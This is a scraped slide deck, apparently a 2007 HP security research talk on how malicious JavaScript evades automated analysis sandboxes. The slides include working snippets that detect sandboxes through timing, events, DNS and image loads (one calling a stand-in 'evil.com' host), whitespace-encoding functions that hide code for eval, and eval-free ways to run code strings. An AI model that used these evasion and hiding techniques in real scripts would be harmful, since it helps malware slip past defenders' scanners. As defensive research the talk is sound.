Download presentation
Presentation is loading. Please wait.
Published byGabriella Meek Modified over 9 years ago
1
© 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Circumventing Automated JavaScript Analysis Billy Hoffman (billy.hoffman@hp.com) HP Web Security Research Group
2
Overview JavaScript is part of attackers toolkit −All the “vanilla” stuff over −Packing traditional malware IBM ISS: “In second half 2007 Web attack obfuscation approached 100%”* Exploit frameworks amplify the problem −Rapid adoption of new techniques We need tools to analyze this How are we doing and can we win? * From: IBM Internet Security Systems X-Force® 2008 Mid-Year Trend Statistics
3
Obfuscation Design Pattern Malicious code is stored −String literals −Numeric literals Decode function unpacks literals into new code Ratio of literals to total code is huge! −Normal code: 2%-7% −Obfuscated code: > 30%
4
Obfuscation Example
5
Obfuscation != Malicious Legitimate reasons for obfuscating −“Protect” client-side code −Reducing download size Common packers −JSMin −Dean Edwards packer −Yahoo’s Result: Its tough to know what to analyze
6
Original Approach to JS Analysis The Lazy Method −Replace dangerous calls with alert() −Run in a browser The Tom Liston Method −Wrap writes in ’s −Run in a browser The Perl-Fu Method −Port malware to in Perl The Monkey Wrench Method −Run it in Spider Monkey
7
Tricks to Defeating Analysis Deliberate sandbox breaks − Integrity Checks −Arguments.callee.toString() arguments.callee.toString().replace(/\W/g,"").toUpperCase(); −Gives source code of function body Length checks Use function body as key
8
VBScript Wrapper Still in use! −Older DHTML web apps −Plug-in enumeration (IE8) −Malware No open source VBScript parsers No public standard grammar Not very wide-spread VBScriptJavaScript
9
Preventing Sample Collection Can’t reverse what you don’t have! Track IPs −Geolocation −Blacklist security firms Serve once per IP User-agent sniffing document.referrer tricks
10
For those playing at home ApproachDifficulties All ApproachesSampling Prevention The Lazy MethodIntegrity checks Running hostile code in browser The Tom Liston MethodIntegrity checks escapes Running hostile code in browser Perl FuWay too time consuming Translating JavaScript constructs The Monkey Wrench ApproachDoes pretty well
11
Approach Today Combination of automatic and manual Interpreters and debuggers (aka sandboxes) −Rhino −NJS −DecryptJS −SpiderMonkey Trap/monitor certain events −DOM calls −eval()s, etc
12
Its More Complex Than That JS interpreter/debugger less than ½ the battle JavaScript != DOM −Host objects −Events/Timers −HTTP requests −Error handling DOM >= HTML −HTTP headers/cookies −Browser environment −Plug-ins
13
Fundamental Issue Current JavaScript sandboxes fail to fully/properly emulate browser environment. These discrepancies are detectable by the JavaScript running inside the sandbox.
14
Fundamental Issue. !=
15
Detecting JavaScript Sandboxes 4 big areas −DOM Testing −Network Testing −Execution Environment Testing −Plug-in Testing Use test results −Decrypt next layer −Handshake to serve next layer
16
DOM Testing Using the DOM values Detecting presence/lack of Get and sets on values Interacting with HTML elements
17
DOM Testing: Basic Sandbox Specific Functions −gc() −clone() −trap() −untrap() −readline() Malware forces SpiderMonkey to die −try {quit();} catch (e) { }; //more code here
18
Detecting Sandbox Specific Functions if(typeof(gc)==“function”) {… } else {…}
19
Function Clobbering JavaScript is highly dynamic Can redefine functions at runtime! 19
20
Redefining print() as quit()
21
Redefining quit() To Nothing
22
Intertwined DOM Properties Various aliases in the DOM −document.location == window.location == document.URL −window == window.window == window.self == window.parent == window.self.self.self.self... −Any global variable attaches to window var spi = 5; window.spi == spi; //true Set a value on one alias Read on another alias Different values means sandbox
23
document.retarded Mosaic Netscape 0.9beta (1994) Set using HTTP headers −Set-Cookie: −Cookie: Get/Set using JavaScript −document.cookie
24
document.retarded Mosaic Netscape 0.9beta (1994) Set using HTTP headers −Set-Cookie: −Cookie: Get/Set using JavaScript −document.cookie Set using HTML − tag
25
Meta Tag Supply meta data about HTML document http-equiv attribute −Allows document to specify HTTP headers −Content overriding an application protocol
26
HTTP-EQUIV to the rescue Setting cookies with HTML alert(document.cookie);
27
Setting Cookies with HTML
28
Hello Proprietary Extension! Setting cookies with HTML alert(document.cookie);
29
Setting Cookies with HTML
30
More Meta Tag Fun Hide Script in non-scriptable attribute Safe All safe. Trust me!
31
HTTP Refresh Header Completely remove JS from response body! HTTP/1.1 200 OK Refresh: 0;url=javascript:alert('EVIL!') Connection: close Content-Length: 29 I'm Clean... really.
32
Psst! (IE8 supports the data: URI... data:text/html and data:text/javascript are awesome!)
33
Network Testing Sandbox use dummy network objects −Good “Are you a browser?” test Use information about response −DNS successful? −Last Modified? −Image Dimensions? −Valid Response? Forces Sandbox to send network traffic −Web bugs for hackers?
34
Network Testing – DNS Lookups var count =0; function loaded(name) {if(name!="bad")count++;} window.onload = function evil() { if(count == 1) alert("Browser!"); else alert("Sandbox!"); }
35
Network Testing – DNS Lookups
36
Network Testing - Images Image object provides rich meta data −Length −Width −Image was valid? CSS Images too Use this information −Complex handshaking −Construct a Key var img = new Image(); img.onload = goodFunc; img.onerror = badFunc; img.src="http://evil.com/"
37
Side Note: Image Side Channels JavaScript Image object Height + width = 8 bytes How to send 0xFFFFFFFF without 4GB of pixel data? −GIF, PNG, Windows too short −BMP + RLE? Nope XBM Image Format #define w 1351 #define h 1689 static char b[]={0};
38
FF XBM WTF??!!!1111oneoneoneomg
39
The Dan Kaminski Option
40
Network Testing - Ajax Ajax can see HTTP response headers − Complex handshaking − Construct a key var xhr = new XmlHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState==4 && xhr.status=200) { if(xhr.getResponseHeader("Secr3t") == "key") { //do evil }
41
Execution Environment Testing Sandbox execute code differently −Trap function calls −Step/break on code −Manipulate data Can tell these differences −Timing information −Event Order −Error Handling
42
Timing Information Use JavaScript’s Date object −Millisecond resolution times Can detect paused execution var start = (new Date()).getTime(); document.writeln(String.fromCharCode(66,77,72)); var diff= (new Date()).getTime() - start; if(diff < 3) document.writeln("Browser"); else document.writeln("Sandbox");
43
Detecting Steps/Breaks with Timers Timers are a pain! −Can’t really wait 5 seconds −Ordering −Clearing Can detect paused execution Start a Timer −Perform some math operation After fixed interval −Sample the value Count++ …
44
Detecting Steps/Breaks with Timers var count = 0; setInterval("count++;", 10); setTimeout(checkSum, 1000); function checkSum() { //allow for skew if(count >= 950 && count <=1000) { alert("Browser"); } else { alert("Sandbox"); }
45
Event Order Sandboxs don’t run events in the proper order XmlHttpRequest’s onreadystatechange() fires 4 times onclick() >> onclick() >> ondbclick() onkeydown() >> onkeyup() >> onkeypress() onmousedown() >> onmouseup() >> onclick() onmouseover() >> onmousemove() onclick() >> onfocus() (for inputs) onfocus() >> onblur() onload() >> onunload()
46
Advanced Event Order Dependant’s onload before window.onload −iFrames −Images Event propagation −DOM events must bubble −Continue based on return value of event Events that never fire −Invisible with CSS INPUT DIV BODY WINDOW onclick
47
Error Handling window.onerror handles uncaught exceptions Induce syntax errors Recover in handler window.onerror = function() { //evil code } Lolz &nd B00m$; //Syntax Error
48
Error Handling window.onerror handles uncaught exceptions Induce runtime errors Harder to handle/debug window.onerror = function() { //evil code } function boom() { return ‘so long!’ & boom(); } boom(); // error too much recursion
49
Advanced Error Handling Detailed info passed to window.onerror −Message −File −Line Number Can be to −Fingerprint web browser −Verify domain/location −Construct a decryption key
50
Plug-in Testing Not just navigator.plug-ins checks Timing is a cool test −Did I really invoke that ActiveX object? Sizing is a cool test −Is that Applet really 400 x 300? Cross Communication −Really sexy! −Apply previous methods inside plug-in Error handling, Eventing, etc
51
JavaScript -> Flash -> JavaScript Multiple ways −getURL(); −Flash LSO Additional capabilities −Richer HTTP requests −More File formats Excellent browser support FlashJavaScript
52
JavaScript -> Java -> JavaScript Lots of fun object casting −JSObject -> double -> JSObject Java has more capabilities than JS −High resolution timers −Sockets −Internal IP Assault the researcher! −Signed Applets can access the file system! LiveConnect −var myAddress = java.net.InetAddress.getLocalHost(); JavaJavaScript
53
Preventing Sample Gathering Browser Identification for Web Applications (Shreeraj Shah 2004) HTTP headers −Ordering and Values −Redirects, form posts, content types, cookie settings HTTP Caching −Obeying the directives HTTP/1.1 HTTP/1.0 Precedence −Sending conditional GETs
54
Crazy Idea #1 Obfuscated Code is obviously interesting −But not always malicious “Safe” looking code might not be interesting Can I create code that doesn’t look malicious?
55
Dehydrating a String Converts any string into whitespace 7 bit per character −1 = space −0 = tab \n means we are done ‘a’ = 1100001 Dehydrate('a') = space, space, tab, tab, tab, tab, space
56
Dehydrate Function function dehydrate(s) { var r = new Array(); for(var i=0; i < s.length; i++) { for(var j=6; j >=0; j—) { if(s.charCodeAt(i) & (Math.pow(2,j))) { r.push(' '); } else { r.push('\t'); } r.push('\n'); return r.join(''); }
57
Hydrate Function function hydrate(s) { var r = new Array(); var curr = 0; while(s.charAt(curr) != '\n') { var tmp = 0; for(var i=6; i>=0; i—) { if(s.charAt(curr) == ' ') { tmp = tmp | (Math.pow(2,i)); } curr++; } r.push(String.fromCharCode(tmp)); } return r.join(''); }
58
Invisible Malicious Code! //st4rt //3nd var html = document.body.innerHTML; var start = html.indexOf("//st" + "4rt"); var end = html.indexOf("3" + "nd"); var code = html.substring(start+12, end); eval(hydrate(code));
59
Crazy Idea #2 Who cares how its encoded? Eventually they have to execute the string of code CaffeineMonkey et al are just hooking eval() Can I execute malicious code stored in a string without eval() ?
60
Eval() The Interpreter has a Posse… var evilCode = "alert('evil');"; window.location.replace("javascript:" + evilCode); document.location.replace("javascript:" + evilCode); setTimeout(evilCode, 10); setInterval(evilCode, 500); new Function(evilCode)(); //IE only window.execScript(evilCode); 60
61
Fixing All of This Advice for tool developers −Remove discrepancies between sandbox and browser DOM/HTTP/DNS/Network/Eventing −Everything should be interesting −The sandbox needs a sandbox; you will be attacked. Advice for others −Microsoft Publish a Grammar for VBScript Disable completely based on DOCTYPE −Adobe: Release an controllable Flash VM
62
Shoulders of Giants Jose Nazario Ben Feinstein Internet Storm Center guys Stephan Chenette, et al. @ WebSense Shreeraj Shah Rob Freeman Aviv Raff
63
Questions? Billy.hoffman@hp.com
64
© 2007 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice Circumventing Automated JavaScript Analysis Billy Hoffman (billy.hoffman@hp.com) HP Web Security Research Group
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.